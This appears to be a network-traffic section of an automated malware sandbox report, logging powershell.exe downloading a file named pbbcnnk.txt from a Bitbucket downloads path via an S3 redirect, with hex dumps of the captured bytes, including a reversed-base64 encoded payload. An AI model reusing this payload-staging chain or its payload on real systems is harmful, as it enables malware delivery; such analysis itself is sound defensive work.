                                                                                                                    2025-01-03 22:20:00 UTC1378INData Raw: 26 98 26 02 60 98 86 98 00 20 c0 00 00 29 30 00 10 60 00 09 80 00 00 00 00 31 00 28 00 69 80 00 00 00 03 12 30 43 00 00 00 01 30 1a 74 9a 06 00 00 80 30 4d 0c 10 c0 01 31 03 04 03 00 1a 00 01 30 01 30 62 41 a6 02 60 00 00 00 03 0b 00 00 00 1a 06 81 a1 89 8d 06 98 a4 9d 89 a0 18 20 00 00 00 2a 24 80 1d 80 00 31 00 62 06 00 58 00 0c 01 92 44 c1 18 08 00 83 00 18 00 58 0c 14 a2 c6 26 83 4c 72 84 ae 66 f9 8c cb 99 16 d0 29 a6 21 40 62 68 40 69 5a 10 c4 0d 00 d0 0d 00 00 a0 00 84 4a 2c 00 06 80 18 86 c4 8d 30 01 88 18 d1 2b 13 4d 00 04 30 1a 28 68 91 b4 e9 30 13 04 10 28 0c 00 40 01 a0 06 21 30 04 35 01 23 4c 54 c0 13 10 06 0a 40 80 01 96 26 10 03 12 60 01 40 98 0d 43 19 62 24 90 4c 54 48 44 30 1c 41 89 80 80 1a 1a 10 00 a0 80 4d 4a 0d 00 0a d3 95 88 24 8a 49
                                                                                                                    Data Ascii: &&` )0`1(i0C0t0M100bA` *$1bXDX&Lrf)!@bh@iZJ,0+M0(h0(@!05#LT@&`@Cb$LTHD0AMJ$I
                                                                                                                    2025-01-03 22:20:00 UTC1378INData Raw: 00 00 00 00 00 00 00 00 28 06 20 00 00 06 20 62 06 00 02 60 00 00 00 00 05 00 00 00 00 00 00 00 00 00 00 00 c1 30 13 43 43 10 30 00 00 00 28 13 80 0b 00 14 01 00 62 00 00 00 00 00 1a 00 06 86 26 98 00 00 00 08 00 03 04 d3 00 00 00 01 06 81 a1 80 00 26 0d 00 30 13 00 0b 1a 18 21 c0 05 00 00 08 34 00 0a 34 20 0c 40 00 00 d0 0c 00 01 30 13 00 00 00 00 10 06 02 60 08 60 02 60 01 40 d2 00 0c 00 00 06 81 a0 1a 62 6d 58 00 09 80 00 00 00 00 c0 69 a0 00 03 a4 0c 10 c0 04 06 84 c0 00 50 00 06 82 68 68 00 00 06 20 06 08 18 00 31 00 89 82 80 00 00 d3 44 30 43 00 68 01 88 00 69 a0 05 02 60 00 03 13 4c 00 46 98 00 86 26 26 3a 06 90 06 26 21 80 8d 00 34 c1 0e 86 9a 26 00 d0 8c 0a 1b 10 4d 43 40 36 8a 6c 11 8d 22 60 0c 2c 4d 82 18 80 30 42 1b 4c 1a 10 69 89 a0 24 81 34
                                                                                                                    Data Ascii: ( b`0CC0(b&&0!44 @0```@bmXiPhh 1D0Chi`LF&&:&!4&MC@6l"`,M0BLi$4
                                                                                                                    2025-01-03 22:20:00 UTC1378INData Raw: 00 40 0c 00 10 01 58 cb 3c e0 1f 3f ec 80 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c4 00 00 00 34 00 c4 c0 4c 04 30 4c 04 c4 34 c0 13 00 04 d0 30 00 10 34 d1 34 d4 43 00 40 c4 31 30 13 01 03 04 8c 05 4c 48 c4 d5 0c 44 c4 34 c1 34 d5 34 d1 00 0d 00 c0 04 c0 04 00 a0 00 00 4c 20 02 80 00 00 00 00 00 00 00 00 00 00 00 00 02 80 00 00 1a 00 00 00 1a 01 80 20 60 09 80 00 00 00 14 00 00 00 00 d0 00 00 00 00 0d 0c 10 0c 13 01 0c 00 00 00 02 80 10 01 40 24 00 b4 01 00 00 00 00 00 00 00 68 60 81 a0 18 00 02 06 00 00 9a 26 0a 00 83 4c 00 00 00 1a 20 60 98 02 60 0c 43 43 01 00 28 00 18 00 00 34 80 00 00 0c 10 d0 c0 00 00 00 00 00 1a 04 01 aa 00 00 46 80 1a 06 05 00 00 00 00 00 00 20 00 34 03 10 0d 03 10 c0 00 06 80 1a 2c 60 03 40 c4 c0 01 0d 0c
                                                                                                                    Data Ascii: @X<?P4L0L4044C@10LHD444L `@$h`&L ``CC(4F 4,`@
                                                                                                                    2025-01-03 22:20:00 UTC1378INData Raw: 63 1a 04 20 01 44 12 80 00 98 98 a8 4d cb 11 82 63 10 00 31 00 95 45 8d 22 c6 26 98 34 20 0c 40 c4 34 30 44 a2 48 8b 00 02 93 68 00 81 85 83 1a 31 bb 12 6d 10 31 34 0d 00 02 00 8c b2 71 74 20 86 05 0d 03 40 0d 21 8a 42 69 89 a0 01 00 12 82 74 49 12 34 2a 6a 24 b2 44 55 91 52 b4 0a a5 12 1b 4e 9c 5a 1a 68 60 d1 c4 01 02 80 0d 00 21 ca 98 d1 01 42 93 22 c0 8b 60 0d 20 d3 10 c0 04 31 4a 93 4d 04 31 49 c5 24 9a 00 62 68 3c d8 1e 0f b6 00 00 00 00 00 00 00 00 00 00 34 00 00 d3 00 43 13 10 c1 00 03 04 c0 4d 00 d0 31 03 04 00 20 c1 44 c4 13 04 31 41 31 30 41 00 34 00 00 30 00 54 d3 40 40 d3 01 00 34 03 40 34 00 d0 0d 2b 10 31 08 03 00 40 c2 93 08 13 54 c1 48 c0 a0 00 04 30 00 00 00 00 00 00 00 00 00 a0 08 00 00 28 02 00 28 00 06 80 00 18 00 00 00 00 00 00 00 00
                                                                                                                    Data Ascii: c DMc1E"&4 @40DHh1m14qt @!BitI4*j$DURNZh`!B"` 1JM1I$bh<4CM1 D1A10A40T@@4@4+1@TH0((
                                                                                                                    2025-01-03 22:20:00 UTC1378INData Raw: 06 21 a1 80 02 60 00 00 80 31 0d 03 40 34 e8 05 03 0a 1a 62 60 00 20 d3 00 00 00 00 01 89 a1 01 a0 00 18 08 00 04 b2 40 80 03 00 00 13 4c 4c 04 c0 00 01 80 02 00 50 00 34 c0 00 00 01 a0 20 68 00 00 63 a0 12 34 25 01 4a c4 c1 a1 18 14 34 03 4d 00 06 80 18 50 c6 82 92 42 71 9d 83 06 40 10 60 00 20 09 5a 18 d0 ec 10 43 40 a8 18 01 43 04 6d 34 60 d0 4d 53 43 44 04 a0 2a 18 e0 02 c4 31 50 d0 20 18 30 8c a2 38 31 50 0a 01 03 15 0a 40 98 d1 30 01 00 d3 00 2c 00 86 05 00 00 00 9b 22 d8 26 08 30 06 3b 22 d8 24 d0 c1 91 63 1b 43 23 10 0c 10 25 68 04 34 03 62 60 80 00 86 a9 49 00 d0 d0 02 68 9a 12 34 45 64 44 57 14 e5 04 02 44 ad 26 a0 98 80 50 71 1b 44 00 00 00 26 00 0d a5 63 04 49 00 0c 12 6c 43 01 82 03 2c 00 00 60 98 21 82 60 03 48 00 00 c4 30 52 8b 06 8b 00 90
                                                                                                                    Data Ascii: !`1@4b` @LLP4 hc4%J4MPBq@` ZC@Cm4`MSCD*1P 081P@0,"&0;"$cC#%h4b`Ih4EdDWD&PqD&cIlC,`!`H0R
                                                                                                                    2025-01-03 22:20:00 UTC1378INData Raw: 00 02 80 00 00 01 00 00 00 00 00 00 00 18 80 06 98 81 88 18 26 08 60 00 80 00 00 00 00 c1 30 43 40 c0 00 13 00 4c 00 01 a1 00 00 00 18 21 82 60 21 b1 00 00 c4 c2 c0 08 00 a0 08 01 d2 18 02 63 40 80 0a 00 8c 4c 00 00 00 00 62 b0 19 08 65 09 80 00 00 80 00 34 00 03 10 d0 c4 30 00 00 62 00 4c 62 00 00 00 28 02 00 74 80 80 1d 21 82 1a 18 08 00 00 c1 34 0c 00 00 00 00 00 00 04 06 94 69 a0 00 34 e9 29 02 00 00 1a 60 86 09 82 00 00 d0 c0 06 9a 26 00 0d 10 0a 0c 44 02 80 00 00 00 03 10 cb 00 00 00 00 13 04 c6 20 06 98 09 80 02 00 c0 45 34 c1 34 e1 0d 00 03 40 09 8a 00 80 25 1a 62 69 80 08 00 a0 34 4c 28 04 36 08 03 10 c1 89 d8 00 12 52 65 89 d8 d8 90 62 06 00 d2 19 24 89 80 98 00 d0 c1 23 02 86 98 c4 d0 62 b2 40 20 08 1a 70 99 2a 43 11 0d 82 45 34 e3 0e 2d 28 02
                                                                                                                    Data Ascii: &`0C@L!`!c@Lbe40bLb(t!4i4)`&D E44@%bi4L(6Reb$#b@ p*CE4-(
                                                                                                                    2025-01-03 22:20:00 UTC1378INData Raw: 49 02 03 04 11 52 4a 40 c7 72 81 00 0a a4 08 93 6a 80 01 a4 60 c4 00 26 1e 54 67 ce fb e0 08 81 89 a6 26 98 26 02 01 a6 08 60 86 86 98 00 81 a6 00 ac 60 00 00 00 00 00 00 00 00 09 80 00 00 00 00 00 00 00 00 00 00 14 01 00 00 00 00 00 00 14 00 00 00 00 34 00 c4 d3 13 40 30 04 d0 d0 c4 c4 0c 00 4c 4d 03 00 00 00 00 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1a 01 82 1a 06 80 68 18 14 98 40 05 00 20 00 00 00 00 00 00 c0 13 10 c0 00 00 04 13 15 30 00 11 30 00 00 00 00 01 82 60 02 06 00 d3 44 0c 00 00 00 00 00 00 01 80 05 80 00 00 26 00 00 99 00 14 0d 00 c0 00 00 13 04 68 06 98 02 60 00 00 80 0a d3 2c 43 00 18 80 46 26 26 00 00 86 81 80 81 82 68 60 09 80 d0 50 04 0d 03 05 60 0c 4d 30 00 00 01 a0 00 01 91 18 00 00 00 00 0d 0d 0c 43 04 c0 00 13 00 19 60 86 21
                                                                                                                    Data Ascii: IRJ@rj`&Tg&&``4@0LMh@ 00`D&h`,CF&&h`P`M0C`!


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    2192.168.2.449732185.166.143.484438000C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2025-01-03 22:20:09 UTC103OUTGET /fqwfwrqwe/werwfqwf/downloads/pbbcnnk.txt HTTP/1.1
                                                                                                                    Host: bitbucket.org
                                                                                                                    Connection: Keep-Alive
                                                                                                                    2025-01-03 22:20:10 UTC5916INHTTP/1.1 302 Found
                                                                                                                    Date: Fri, 03 Jan 2025 22:20:10 GMT
                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                    Content-Length: 0
                                                                                                                    Server: AtlassianEdge
                                                                                                                    Location: https://bbuseruploads.s3.amazonaws.com/e3c0f433-171c-46e2-89e0-333c78666859/downloads/b6ce439c-77f0-4c70-80bf-c31644de3b36/pbbcnnk.txt?response-content-disposition=attachment%3B%20filename%3D%22pbbcnnk.txt%22&AWSAccessKeyId=ASIA6KOSE3BNMJEEV3FX&Signature=z6SeEEmtoWPAk%2Bh79ka8wMIffkg%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEB8aCXVzLWVhc3QtMSJGMEQCIBNJmShv7MGKINf2cFLnqR6qyLtPe98WLo7eDI9nQcNyAiAN6HDMTik4z8uQLRDJhMts25H6pPl7Yd4U0Vq62UnK%2BSqwAgj3%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F8BEAAaDDk4NDUyNTEwMTE0NiIM9t%2FCyMR70fx2FzCcKoQCXAjF45TfCV1fS6QZGBy56NaisJivwPlbDu%2Bnl98ll7DIvxurRbCCrTVLgI4LQynZnjuZvsiqnDUoNbORBgTWGJU5uYv4iLjk4tTmBS%2B9xetZkTp5LmCRubDsgSNP%2BqADqgSaNmv%2BWfVNWqMN8divArRrR9ER%2Bete9%2BlnREMX87DwhO1aMuQ50M8ywOZp97IB%2B0vVwHTEXWW%2BF36a%2FHKcAQHseZz%2FGDQCdCYq2ShfmMQnO53E2prvYX1wAG3mwY3af0Bw47PhA57rXXKLXSu85BI%2F3jGtdUtmMd%2B9xhbxbWYRivLXWOAHE0xUSTZTmFi1SXYrGVfXLQkKHBeZDxkL6NKHb%2FIw7cLhuwY6ngFG9dexa8v%2BqlSQ1OHbxL1SLgJZVR9ROphuLtPTEivNX9TCHpw0gW13lOyyGCDi5EM5C7mFfXpA8dH2%2BRyekxJMAGUn3SuYq5WACq1 [TRUNCATED]
                                                                                                                    Expires: Fri, 03 Jan 2025 22:20:10 GMT
                                                                                                                    Cache-Control: max-age=0, no-cache, no-store, must-revalidate, private
                                                                                                                    X-Used-Mesh: False
                                                                                                                    Vary: Accept-Language, Origin
                                                                                                                    Content-Language: en
                                                                                                                    X-View-Name: bitbucket.apps.downloads.views.download_file
                                                                                                                    X-Dc-Location: Micros-3
                                                                                                                    X-Served-By: 0b831889bda4
                                                                                                                    X-Version: c9b3998323c0
                                                                                                                    X-Static-Version: c9b3998323c0
                                                                                                                    X-Request-Count: 3779
                                                                                                                    X-Render-Time: 0.05969715118408203
                                                                                                                    X-B3-Traceid: ed66f170283e4292939316583b051859
                                                                                                                    X-B3-Spanid: db3ab7d825502d31
                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                    Content-Security-Policy: object-src 'none'; style-src 'self' 'unsafe-inline' https://aui-cdn.atlassian.com/ https://cdn.cookielaw.org/ https://bbc-frontbucket-static.stg-east.frontend.public.atl-paas.net https://bbc-frontbucket-static.prod-east.frontend.public.atl-paas.net https://bbc-frontbucket-canary.prod-east.frontend.public.atl-paas.net https://bbc-frontbucket-exp.prod-east.frontend.public.atl-paas.net https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/ https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/ https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/; script-src 'unsafe-eval' 'strict-dynamic' 'unsafe-inline' 'self' http: https: https://remote-app-switcher.stg-east.frontend.public.atl-paas.net https://remote-app-switcher.prod-east.frontend.public.atl-paas.net https://bbc-frontbucket-static.stg-east.frontend.public.atl-paas.net https://bbc-frontbucket-static.prod-east.frontend.public.atl-paas.net https://bbc-frontbucket-canary. [TRUNCATED]
                                                                                                                    X-Usage-Quota-Remaining: 989287.382
                                                                                                                    X-Usage-Request-Cost: 902.33
                                                                                                                    X-Usage-User-Time: 0.027070
                                                                                                                    X-Usage-System-Time: 0.000000
                                                                                                                    X-Usage-Input-Ops: 0
                                                                                                                    X-Usage-Output-Ops: 0
                                                                                                                    Age: 0
                                                                                                                    X-Cache: MISS
                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                    X-Xss-Protection: 1; mode=block
                                                                                                                    Atl-Traceid: ed66f170283e4292939316583b051859
                                                                                                                    Atl-Request-Id: ed66f170-283e-4292-9393-16583b051859
                                                                                                                    Strict-Transport-Security: max-age=63072000; includeSubDomains; preload
                                                                                                                    Report-To: {"endpoints": [{"url": "https://dz8aopenkvv6s.cloudfront.net"}], "group": "endpoint-1", "include_subdomains": true, "max_age": 600}
                                                                                                                    Nel: {"failure_fraction": 0.001, "include_subdomains": true, "max_age": 600, "report_to": "endpoint-1"}
                                                                                                                    Server-Timing: atl-edge;dur=168,atl-edge-internal;dur=4,atl-edge-upstream;dur=166,atl-edge-pop;desc="aws-eu-central-1"
                                                                                                                    Connection: close


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    3192.168.2.44973352.216.138.834438000C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2025-01-03 22:20:11 UTC1199OUTGET /e3c0f433-171c-46e2-89e0-333c78666859/downloads/b6ce439c-77f0-4c70-80bf-c31644de3b36/pbbcnnk.txt?response-content-disposition=attachment%3B%20filename%3D%22pbbcnnk.txt%22&AWSAccessKeyId=ASIA6KOSE3BNMJEEV3FX&Signature=z6SeEEmtoWPAk%2Bh79ka8wMIffkg%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEB8aCXVzLWVhc3QtMSJGMEQCIBNJmShv7MGKINf2cFLnqR6qyLtPe98WLo7eDI9nQcNyAiAN6HDMTik4z8uQLRDJhMts25H6pPl7Yd4U0Vq62UnK%2BSqwAgj3%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F8BEAAaDDk4NDUyNTEwMTE0NiIM9t%2FCyMR70fx2FzCcKoQCXAjF45TfCV1fS6QZGBy56NaisJivwPlbDu%2Bnl98ll7DIvxurRbCCrTVLgI4LQynZnjuZvsiqnDUoNbORBgTWGJU5uYv4iLjk4tTmBS%2B9xetZkTp5LmCRubDsgSNP%2BqADqgSaNmv%2BWfVNWqMN8divArRrR9ER%2Bete9%2BlnREMX87DwhO1aMuQ50M8ywOZp97IB%2B0vVwHTEXWW%2BF36a%2FHKcAQHseZz%2FGDQCdCYq2ShfmMQnO53E2prvYX1wAG3mwY3af0Bw47PhA57rXXKLXSu85BI%2F3jGtdUtmMd%2B9xhbxbWYRivLXWOAHE0xUSTZTmFi1SXYrGVfXLQkKHBeZDxkL6NKHb%2FIw7cLhuwY6ngFG9dexa8v%2BqlSQ1OHbxL1SLgJZVR9ROphuLtPTEivNX9TCHpw0gW13lOyyGCDi5EM5C7mFfXpA8dH2%2BRyekxJMAGUn3SuYq5WACq1%2F8nc%2F%2FDn6Zi928v7gZvFhsPeVs350Qyj22FiTV [TRUNCATED]
                                                                                                                    Host: bbuseruploads.s3.amazonaws.com
                                                                                                                    Connection: Keep-Alive
                                                                                                                    2025-01-03 22:20:11 UTC525INHTTP/1.1 200 OK
                                                                                                                    x-amz-id-2: WI/d/8MWgkx6kGjf1gbtor4aSF0H0BkfHXqrY1kQ63C7Ric+sj1AY0qsIDCeYul2kJ7is3uJMmg=
                                                                                                                    x-amz-request-id: KP4JMETCTYDJ8PPQ
                                                                                                                    Date: Fri, 03 Jan 2025 22:20:12 GMT
                                                                                                                    Last-Modified: Fri, 03 Jan 2025 20:45:14 GMT
                                                                                                                    ETag: "509d8394ffe033d82e56aa6363ae1803"
                                                                                                                    x-amz-server-side-encryption: AES256
                                                                                                                    x-amz-version-id: uk_.l.9PBFz9NDoCRp7VJOcxx_Hvx3b.
                                                                                                                    Content-Disposition: attachment; filename="pbbcnnk.txt"
                                                                                                                    Accept-Ranges: bytes
                                                                                                                    Content-Type: text/plain
                                                                                                                    Content-Length: 65552
                                                                                                                    Server: AmazonS3
                                                                                                                    Connection: close
                                                                                                                    2025-01-03 22:20:11 UTC16384INData Raw: 3d 3d 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                    Data Ascii: ==AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                    2025-01-03 22:20:11 UTC499INData Raw: 67 41 67 63 41 38 47 41 6d 42 41 49 41 51 47 41 6c 42 41 64 41 49 48 41 68 42 41 64 41 4d 48 41 67 41 77 63 41 4d 48 41 6c 42 77 59 41 38 47 41 79 42 41 63 4c 43 49 41 41 41 43 41 36 41 51 5a 41 51 47 41 76 42 51 62 41 41 43 41 7a 42 77 63 41 55 47 41 6a 42 77 62 41 49 48 41 77 42 41 49 41 77 47 41 68 42 77 59 41 6b 47 41 30 42 51 61 41 49 48 41 6a 42 41 49 41 63 47 41 75 42 51 61 41 77 47 41 69 42 51 59 41 4d 48 41 70 42 41 5a 41 41 43 41 79 42 77 62 41 49 48 41 79 42 51 52 50 42 41 41 67 41 67 4f 41 55 47 41 6b 42 77 62 41 30 47 41 67 41 77 63 41 4d 48 41 6c 42 77 59 41 38 47 41 79 42 41 63 41 41 43 41 73 42 51 59 41 4d 47 41 70 42 41 64 41 6b 47 41 79 42 77 59 41 41 43 41 6e 42 67 62 41 6b 47 41 73 42 67 59 41 45 47 41 75 42 51 5a 41 41 43 41 79 42 77
                                                                                                                    Data Ascii: gAgcA8GAmBAIAQGAlBAdAIHAhBAdAMHAgAwcAMHAlBwYA8GAyBAcLCIAAACA6AQZAQGAvBQbAACAzBwcAUGAjBwbAIHAwBAIAwGAhBwYAkGA0BQaAIHAjBAIAcGAuBQaAwGAiBQYAMHApBAZAACAyBwbAIHAyBQRPBAAgAgOAUGAkBwbA0GAgAwcAMHAlBwYA8GAyBAcAACAsBQYAMGApBAdAkGAyBwYAACAnBgbAkGAsBgYAEGAuBQZAACAyBw
                                                                                                                    2025-01-03 22:20:11 UTC16384INData Raw: 41 76 42 41 52 41 4d 47 41 77 41 67 55 41 67 45 41 68 6c 57 41 41 49 43 41 67 41 41 62 41 55 47 41 45 42 41 49 41 59 43 41 67 41 41 62 41 55 48 41 4f 42 41 49 41 34 44 41 67 41 41 4d 41 41 44 41 77 41 41 4e 41 41 43 41 33 42 51 4c 41 41 43 41 78 41 41 49 41 34 47 41 74 41 41 49 41 45 44 41 75 41 51 4d 41 34 43 41 78 41 67 4c 41 45 44 41 67 41 77 5a 41 34 47 41 70 42 41 63 41 41 43 41 44 42 77 4c 56 42 41 41 74 42 51 5a 41 51 48 41 7a 42 51 65 41 4d 46 41 67 41 77 61 41 4d 48 41 6c 42 41 52 41 6b 48 41 75 42 51 51 64 41 41 41 75 41 41 5a 41 55 47 41 73 42 51 61 41 45 47 41 6d 42 41 49 41 34 47 41 76 42 51 61 41 51 48 41 31 42 77 59 41 55 47 41 34 42 51 5a 41 41 43 41 6b 42 67 62 41 45 47 41 67 41 41 5a 41 45 47 41 76 42 41 62 41 34 47 41 33 42 77 62 41 51
                                                                                                                    Data Ascii: AvBARAMGAwAgUAgEAhlWAAICAgAAbAUGAEBAIAYCAgAAbAUHAOBAIA4DAgAAMAADAwAANAACA3BQLAACAxAAIA4GAtAAIAEDAuAQMA4CAxAgLAEDAgAwZA4GApBAcAACADBwLVBAAtBQZAQHAzBQeAMFAgAwaAMHAlBARAkHAuBQQdAAAuAAZAUGAsBQaAEGAmBAIA4GAvBQaAQHA1BwYAUGA4BQZAACAkBgbAEGAgAAZAEGAvBAbA4GA3BwbAQ
                                                                                                                    2025-01-03 22:20:11 UTC1024INData Raw: 41 47 59 42 44 41 6b 5a 41 71 6a 51 72 41 51 53 41 69 6d 52 76 41 77 52 41 56 75 77 67 41 77 52 41 41 6f 77 65 43 6b 63 41 39 53 52 4d 44 45 52 41 79 69 51 72 41 51 52 41 69 6d 52 76 41 77 51 41 56 75 77 67 41 77 51 41 70 52 42 4a 44 45 52 41 66 74 77 67 44 45 51 41 58 6c 67 53 41 6b 61 41 52 68 77 4e 43 45 66 41 4c 56 51 2f 41 6b 61 41 46 6f 41 70 43 6b 63 41 45 39 51 32 43 6b 47 41 71 69 67 44 43 45 65 41 6e 6f 78 33 41 6b 63 41 67 6f 68 71 41 6b 4d 41 56 6f 68 38 41 45 65 41 5a 6b 41 34 41 45 4f 41 47 59 42 44 41 45 65 41 4c 6f 67 6d 43 45 64 41 46 6b 78 4b 43 45 48 41 71 69 41 6d 41 6b 64 41 41 49 68 59 43 6b 4d 41 71 71 77 48 43 45 4d 41 36 6e 77 77 41 6b 4d 41 31 6a 42 79 41 6b 4d 41 65 62 78 59 43 6b 4c 41 58 4c 41 70 43 45 4c 41 52 66 42 54 41 45
                                                                                                                    Data Ascii: AGYBDAkZAqjQrAQSAimRvAwRAVuwgAwRAAoweCkcA9SRMDERAyiQrAQRAimRvAwQAVuwgAwQApRBJDERAftwgDEQAXlgSAkaARhwNCEfALVQ/AkaAFoApCkcAE9Q2CkGAqigDCEeAnox3AkcAgohqAkMAVoh8AEeAZkA4AEOAGYBDAEeALogmCEdAFkxKCEHAqiAmAkdAAIhYCkMAqqwHCEMA6nwwAkMA1jByAkMAebxYCkLAXLApCELARfBTAE
                                                                                                                    2025-01-03 22:20:11 UTC16384INData Raw: 41 41 41 41 41 41 41 67 43 54 41 67 41 41 41 77 44 6e 44 51 41 41 41 67 43 50 44 51 41 41 41 67 43 50 44 51 41 41 41 67 44 47 43 67 41 41 41 41 46 5a 44 51 41 41 41 77 46 6b 44 77 41 67 41 41 45 76 43 67 41 67 41 41 45 65 72 54 67 44 43 51 41 67 41 51 47 70 41 51 41 41 41 67 42 32 42 51 41 41 41 41 43 48 42 67 41 51 41 52 45 6e 42 51 41 41 41 51 45 6e 42 51 41 41 41 51 45 6e 42 51 41 41 41 51 47 57 43 77 41 51 41 68 43 70 44 67 41 51 41 52 45 6e 42 51 41 41 41 67 46 36 42 67 41 41 41 51 43 43 42 51 41 41 41 77 42 59 42 67 42 41 41 77 46 30 42 51 42 41 41 51 46 41 43 41 42 41 41 41 47 73 44 77 41 41 41 67 44 62 42 67 41 41 41 77 46 35 41 51 41 41 41 67 43 78 44 77 41 41 41 67 44 31 42 67 41 41 41 41 47 69 44 51 41 41 41 51 47 6b 43 41 42 41 41 77 43 55 41
                                                                                                                    Data Ascii: AAAAAAAgCTAgAAAwDnDQAAAgCPDQAAAgCPDQAAAgDGCgAAAAFZDQAAAwFkDwAgAAEvCgAgAAEerTgDCQAgAQGpAQAAAgB2BQAAAACHBgAQAREnBQAAAQEnBQAAAQEnBQAAAQGWCwAQAhCpDgAQAREnBQAAAgF6BgAAAQCCBQAAAwBYBgBAAwF0BQBAAQFACABAAAGsDwAAAgDbBgAAAwF5AQAAAgCxDwAAAgD1BgAAAAGiDQAAAQGkCABAAwCUA
                                                                                                                    2025-01-03 22:20:11 UTC1024INData Raw: 46 48 45 42 41 48 4d 68 43 41 41 51 6e 76 64 68 41 4b 41 41 41 61 37 48 41 41 41 41 41 43 6d 6a 42 52 59 77 45 4b 41 41 41 50 65 72 54 67 44 47 41 41 49 41 49 67 6f 41 41 41 34 34 63 4b 41 41 41 4e 69 43 33 41 6f 41 41 41 45 7a 62 47 63 41 4c 47 73 67 33 41 41 77 77 79 6b 6d 6a 49 6b 51 44 59 64 52 43 41 41 41 41 4b 41 41 41 36 65 72 54 67 44 47 42 52 59 41 41 4c 77 53 42 52 55 77 45 4b 41 41 41 57 2f 32 47 44 6f 41 41 41 45 34 62 4d 73 69 46 6d 51 51 4c 6c 6f 41 41 41 41 65 72 54 67 44 62 45 45 68 42 41 51 77 45 61 6d 41 43 33 73 53 44 57 77 67 43 41 41 67 6e 76 5a 41 41 41 73 45 4c 48 73 77 41 65 72 54 67 44 54 68 42 41 6f 67 43 41 41 51 6e 76 64 68 41 4b 41 41 41 63 36 48 41 41 45 42 41 41 55 44 41 41 45 77 4e 41 51 41 4d 62 45 41 41 41 73 78 4b 41 6b
                                                                                                                    Data Ascii: FHEBAHMhCAAQnvdhAKAAAa7HAAAAACmjBRYwEKAAAPerTgDGAAIAIgoAAA44cKAAANiC3AoAAAEzbGcALGsg3AAwwykmjIkQDYdRCAAAAKAAA6erTgDGBRYAALwSBRUwEKAAAW/2GDoAAAE4bMsiFmQQLloAAAAerTgDbEEhBAQwEamAC3sSDWwgCAAgnvZAAAsELHswAerTgDThBAogCAAQnvdhAKAAAc6HAAEBAAUDAAEwNAQAMbEAAAsxKAk
                                                                                                                    2025-01-03 22:20:11 UTC10749INData Raw: 6d 57 6f 41 41 41 38 78 62 64 65 72 54 67 44 79 48 57 55 53 41 41 41 77 54 4e 65 68 41 56 77 43 43 4d 6f 41 41 41 34 78 62 77 42 41 44 34 4c 6e 41 41 41 68 6d 57 6f 41 41 41 38 78 62 64 32 79 48 57 55 53 41 41 41 77 54 4e 65 68 41 56 77 79 42 4c 6f 41 41 41 34 78 62 77 42 77 41 46 4c 6e 41 41 41 68 6d 58 6f 41 41 41 38 78 62 64 4b 79 48 57 55 53 41 41 41 77 54 4e 65 68 41 56 77 69 42 4b 6f 41 41 41 34 78 62 77 42 41 41 52 4c 6e 41 41 45 42 41 41 45 44 41 41 41 77 63 41 55 41 4d 54 41 41 41 71 59 51 45 41 73 69 42 54 59 41 6b 79 6b 6d 6a 48 67 41 44 59 64 42 43 41 41 67 43 41 41 51 30 76 70 41 41 41 45 4f 4b 69 6d 67 47 6c 49 36 41 5a 55 69 6f 45 67 52 4a 69 47 41 41 41 38 45 6a 45 41 41 41 66 34 33 46 6c 49 4b 42 52 59 52 4a 42 41 41 41 54 30 34 47 77 42
                                                                                                                    Data Ascii: mWoAAA8xbderTgDyHWUSAAAwTNehAVwCCMoAAA4xbwBAD4LnAAAhmWoAAA8xbd2yHWUSAAAwTNehAVwyBLoAAA4xbwBwAFLnAAAhmXoAAA8xbdKyHWUSAAAwTNehAVwiBKoAAA4xbwBAARLnAAEBAAEDAAAwcAUAMTAAAqYQEAsiBTYAkykmjHgADYdBCAAgCAAQ0vpAAAEOKimgGlI6AZUioEgRJiGAAA8EjEAAAf43FlIKBRYRJBAAAT04GwB
